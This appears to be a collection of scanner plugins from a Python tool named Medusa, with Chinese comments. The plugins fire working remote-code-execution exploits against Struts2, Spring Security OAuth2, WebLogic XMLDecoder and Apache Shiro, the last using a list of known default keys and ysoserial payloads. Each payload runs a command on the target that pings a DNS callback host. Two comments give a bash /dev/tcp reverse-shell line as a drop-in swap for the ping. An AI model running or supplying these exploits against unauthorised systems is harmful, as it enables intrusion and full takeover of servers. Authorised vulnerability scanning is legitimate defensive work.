def medusa(**kwargs)->None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 DL=Dnslog() con="" payload="""%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27ping%20{}%27%29.getInputStream%28%29%29%2C%23q%7D.action""".format(DL.dns_host()) try: payload_url = url+payload try:#防止在linux系统上执行了POC,导致超时扫描不到漏洞 resp = requests.get(payload_url,headers=Headers, timeout=6,proxies=proxies, verify=False) con = resp.text except: pass time.sleep(2) if DL.result(): Medusa = "{} 存在Struts2远程代码执行漏洞(S2-015)\r\n漏洞详情:\r\n版本号:S2-015\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(url,payload_url,con,DL.dns_text(),DL.dns_host()) _t=VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None: proxies=Proxies().result(proxies) scheme, url, port,path = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port DL=Dnslog() con="" data="""<map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>ping</string> <string>{}</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> </entry> </map>""".format(DL.dns_host()) try: payload_url = scheme + "://" + url +":"+ str(port)+path try:#防止在linux系统上执行了POC,导致超时扫描不到漏洞 resp = requests.post(payload_url,headers=Headers,data=data, timeout=6,proxies=proxies, verify=False) con = resp.text except: pass if DL.result(): Medusa = "{} 存在Struts2远程代码执行漏洞(S2-052)\r\n漏洞详情:\r\n版本号:S2-052\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(url,data,con,DL.dns_text(),DL.dns_host()) _t=VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(**kwargs)->None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 try: DL=Dnslog() payload ="/oauth/authorize?client_id=client&response_type=code&redirect_uri=http://www.github.com&scope=%24%7BT%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22ping%20{}%22%29%7D".format(DL.dns_host()) payload_url = url + payload resp = requests.get(payload_url,headers=Headers, proxies=proxies, timeout=6, verify=False) time.sleep(4) if DL.result(): Medusa = "{}存在SpringSecurityOauth2远程代码执行漏洞(CVE-2018-1260)\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format(url,resp.text, DL.dns_host(), str( DL.dns_text())) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(**kwargs)->None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 DL = Dnslog() #<string>bash -i >& /dev/tcp/10.0.0.1/21 0>&1</string>反弹shell,替换ping位置数据 linux_data='''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.4.0" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>ping {}</string> </void> </array> <void method="start"/></void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>'''.format(DL.dns_host()) windows_data='''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.8.0_131" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>C:\Windows\System32\cmd.exe</string> </void> <void index="1"> <string>/c</string> </void> <void index="2"> <string>ping {}</string> </void> </array> <void method="start"/></void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> '''.format(DL.dns_host()) for data in [linux_data, windows_data]: try: payload = '/wls-wsat/CoordinatorPortType' payload_url = url+ payload Headers["Content-Type"]="text/xml" resp = requests.post(payload_url,headers=Headers,data=data, proxies=proxies, timeout=6, verify=False) con = resp.text time.sleep(4) if DL.result(): Medusa = "{}存在WebLogicXMLDecoder反序列化漏洞(CVE-2017-10271)\r\n验证数据:\r\n漏洞位置:{}\r\n利用POC:{}\r\n返回数据包:{}\r\nDNSlog数据:{}\r\nDNSlog随机数:{}\r\n".format(url, payload_url,data, con,DL.dns_text(),DL.dns_host()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e) # 调用写入类传入URL和错误插件名
def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None: proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port ExpClass = "JRMPClient" CipherKey = [ "kPH+bIxk5D2deZiIxcaaaA==", "2AvVhdsgUs0FSA3SDFAdag==", "3AvVhmFLUs0KTA3Kprsdag==", "4AvVhmFLUs0KTA3Kprsdag==", "5AvVhmFLUs0KTA3Kprsdag==", "5aaC5qKm5oqA5pyvAAAAAA==", "6ZmI6I2j5Y+R5aSn5ZOlAA==", "bWljcm9zAAAAAAAAAAAAAA==", "wGiHplamyXlVB11UXWol8g==", "Z3VucwAAAAAAAAAAAAAAAA==", "MTIzNDU2Nzg5MGFiY2RlZg==", "U3ByaW5nQmxhZGUAAAAAAA==", "fCq+/xW488hMTCD+cmJ3aQ==", "1QWLxg+NYmxraMoxAXu/Iw==", "ZUdsaGJuSmxibVI2ZHc9PQ==", "L7RioUULEFhRyxM7a2R/Yg==", "r0e3c16IdVkouZgk1TKVMg==", "bWluZS1hc3NldC1rZXk6QQ==", "a2VlcE9uR29pbmdBbmRGaQ==", "WcfHGU25gNnTxTlmJMeSpw==", "OY//C4rhfwNxCQAQCrQQ1Q==", "5J7bIJIV0LQSN3c9LPitBQ==", "f/SY5TIve5WWzT4aQlABJA==", "bya2HkYo57u6fWh5theAWw==", "WuB+y2gcHRnY2Lg9+Aqmqg==", "kPv59vyqzj00x11LXJZTjJ2UHW48jzHN", "3qDVdLawoIr1xFd6ietnwg==", "ZWvohmPdUsAWT3=KpPqda", "YI1+nBV//m7ELrIyDHm6DQ==", "6Zm+6I2j5Y+R5aS+5ZOlAA==", "2A2V+RFLUs+eTA3Kpr+dag==", "6ZmI6I2j3Y+R1aSn5BOlAA==", "SkZpbmFsQmxhZGUAAAAAAA==", "2cVtiE83c4lIrELJwKGJUw==", "fsHspZw/92PrS3XrPW+vxw==", "XTx6CKLo/SdSgub+OPHSrw==", "sHdIjUN6tzhl8xZMG3ULCQ==", "O4pdf+7e+mZe8NyxMTPJmQ==", "HWrBltGvEZc14h9VpMvZWw==", "rPNqM6uKFCyaL10AK51UkQ==", "Y1JxNSPXVwMkyvES/kJGeQ==", "lT2UvDUmQwewm6mMoiw4Ig==", "MPdCMZ9urzEA50JDlDYYDg==", "xVmmoltfpb8tTceuT5R7Bw==", "c+3hFGPjbgzGdrC+MHgoRQ==", "ClLk69oNcA3m+s0jIMIkpg==", "Bf7MfkNR0axGGptozrebag==", "1tC/xrDYs8ey+sa3emtiYw==", "ZmFsYWRvLnh5ei5zaGlybw==", "cGhyYWNrY3RmREUhfiMkZA==", "IduElDUpDDXE677ZkhhKnQ==", "yeAAo1E8BOeAYfBlm4NG9Q==", "cGljYXMAAAAAAAAAAAAAAA==", "2itfW92XazYRi5ltW0M2yA==", "XgGkgqGqYrix9lI6vxcrRw==", "ertVhmFLUs0KTA3Kprsdag==", "5AvVhmFLUS0ATA4Kprsdag==", "s0KTA3mFLUprK4AvVhsdag==", "hBlzKg78ajaZuTE0VLzDDg==", "9FvVhtFLUs0KnA3Kprsdyg==", "d2ViUmVtZW1iZXJNZUtleQ==", "yNeUgSzL/CfiWw1GALg6Ag==", "NGk/3cQ6F5/UNPRh8LpMIg==", "4BvVhmFLUs0KTA3Kprsdag==", "MzVeSkYyWTI2OFVLZjRzZg==", "CrownKey==a12d/dakdad", "empodDEyMwAAAAAAAAAAAA==", "A7UzJgh1+EWj5oBFi+mSgw==", "YTM0NZomIzI2OTsmIzM0NTueYQ==", "c2hpcm9fYmF0aXMzMgAAAA==", "i45FVt72K2kLgvFrJtoZRw==", "U3BAbW5nQmxhZGUAAAAAAA==", "ZnJlc2h6Y24xMjM0NTY3OA==", "Jt3C93kMR9D5e8QzwfsiMw==", "MTIzNDU2NzgxMjM0NTY3OA==", "vXP33AonIp9bFwGl7aT7rA==", "V2hhdCBUaGUgSGVsbAAAAA==", "Z3h6eWd4enklMjElMjElMjE=", "Q01TX0JGTFlLRVlfMjAxOQ==", "ZAvph3dsQs0FSL3SDFAdag==", "Is9zJ3pzNh2cgTHB4ua3+Q==", "NsZXjXVklWPZwOfkvk6kUA==", "GAevYnznvgNCURavBhCr1w==", "66v1O8keKNV3TTcGPK1wzg==", "SDKOLKn2J1j/2BHjeZwAoQ==", ] BLOCK_SIZE = AES.block_size PAD_FUNC = lambda s: s + ((BLOCK_SIZE - len(s) % BLOCK_SIZE) * chr( BLOCK_SIZE - len(s) % BLOCK_SIZE)).encode() AES_MODE = AES.MODE_CBC AES_IV = uuid.uuid4().bytes YsoserialPath = GetToolFilePath().Result() + "ysoserial.jar" for key in CipherKey: try: DL = Dnslog() popen = subprocess.Popen( ["java", "-jar", YsoserialPath, ExpClass, DL.dns_host()], stdout=subprocess.PIPE) encryptor = AES.new(base64.b64decode(key), AES_MODE, AES_IV) file_body = PAD_FUNC(popen.stdout.read()) base64_ciphertext = base64.b64encode(AES_IV + encryptor.encrypt(file_body)) payload_url = scheme + "://" + url + ":" + str(port) cookies = { "jeesite.session.id": "3f8a61ec-27e2-425c-9724-f96ba0c1e512", "rememberMe": base64_ciphertext.decode() } requests.get(payload_url, cookies=cookies, proxies=proxies, timeout=6, verify=False) if DL.result(): Medusa = "{}存在ShiroRememberMe反序列化命令执行漏洞(CVE-2016-4437)\r\n验证数据:\r\n漏洞位置:{}\r\n秘钥:{}\r\ncookie:{}\r\nDNSLOG请求值:{}\r\nDNSLOG数据:{}\r\n".format( url, payload_url, key, cookies, DL.dns_host(), DL.dns_text()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 break except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) # 调用写入类传入URL和错误插件名
def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None: proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port DL = Dnslog() #<string>bash -i >& /dev/tcp/10.0.0.1/21 0>&1</string>反弹shell,替换ping位置数据 linux_data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.4.0" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>ping {}</string> </void> </array> <void method="start"/></void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>'''.format(DL.dns_host()) windows_data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.8.0_131" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>C:\Windows\System32\cmd.exe</string> </void> <void index="1"> <string>/c</string> </void> <void index="2"> <string>ping {}</string> </void> </array> <void method="start"/></void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> '''.format(DL.dns_host()) for data in [linux_data, windows_data]: try: payload = '/wls-wsat/CoordinatorPortType' payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "text/xml", } resp = requests.post(payload_url, headers=headers, data=data, proxies=proxies, timeout=6, verify=False) con = resp.text time.sleep(4) if DL.result(): Medusa = "{}存在WebLogicXMLDecoder反序列化漏洞(CVE-2017-10271)\r\n验证数据:\r\n漏洞位置:{}\r\n利用POC:{}\r\n返回数据包:{}\r\nDNSlog数据:{}\r\nDNSlog随机数:{}\r\n".format( url, payload_url, data, con, DL.dns_text(), DL.dns_host()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,proxies=None,**kwargs): proxies=Proxies().result(proxies) scheme, url, port,path = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port DL=Dnslog() con="" try: payload_url = scheme + "://" + url +":"+ str(port)+path headers = { 'User-Agent': RandomAgent, "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type":"%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ping "+DL.dns_host()+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" } try:#防止在linux系统上执行了POC,导致超时扫描不到漏洞 resp = requests.post(payload_url,headers=headers, timeout=6,proxies=proxies, verify=False) con = resp.text except: pass time.sleep(2) if DL.result(): Medusa = "{} 存在Struts2远程代码执行漏洞(S2-045)\r\n漏洞详情:\r\n版本号:S2-045\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(url,headers,con,DL.dns_text(),DL.dns_host()) _t=VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(**kwargs)->None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 DL=Dnslog() con="" payload="""?redirect:%24%7B%23a%3D%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D%7B%27ping%27%2c%27{}%27%7D%29%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%20java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew%20java.io.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B500%5D%2C%23d.read%28%23e%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D""".format(DL.dns_host()) try: payload_url = url+payload try:#防止在linux系统上执行了POC,导致超时扫描不到漏洞 resp = requests.get(payload_url,headers=Headers, timeout=6,proxies=proxies, verify=False) con = resp.text except: pass time.sleep(2) if DL.result(): Medusa = "{} 存在Struts2远程代码执行漏洞(S2-016)\r\n漏洞详情:\r\n版本号:S2-016\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(url,payload_url,con,DL.dns_text(),DL.dns_host()) _t=VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类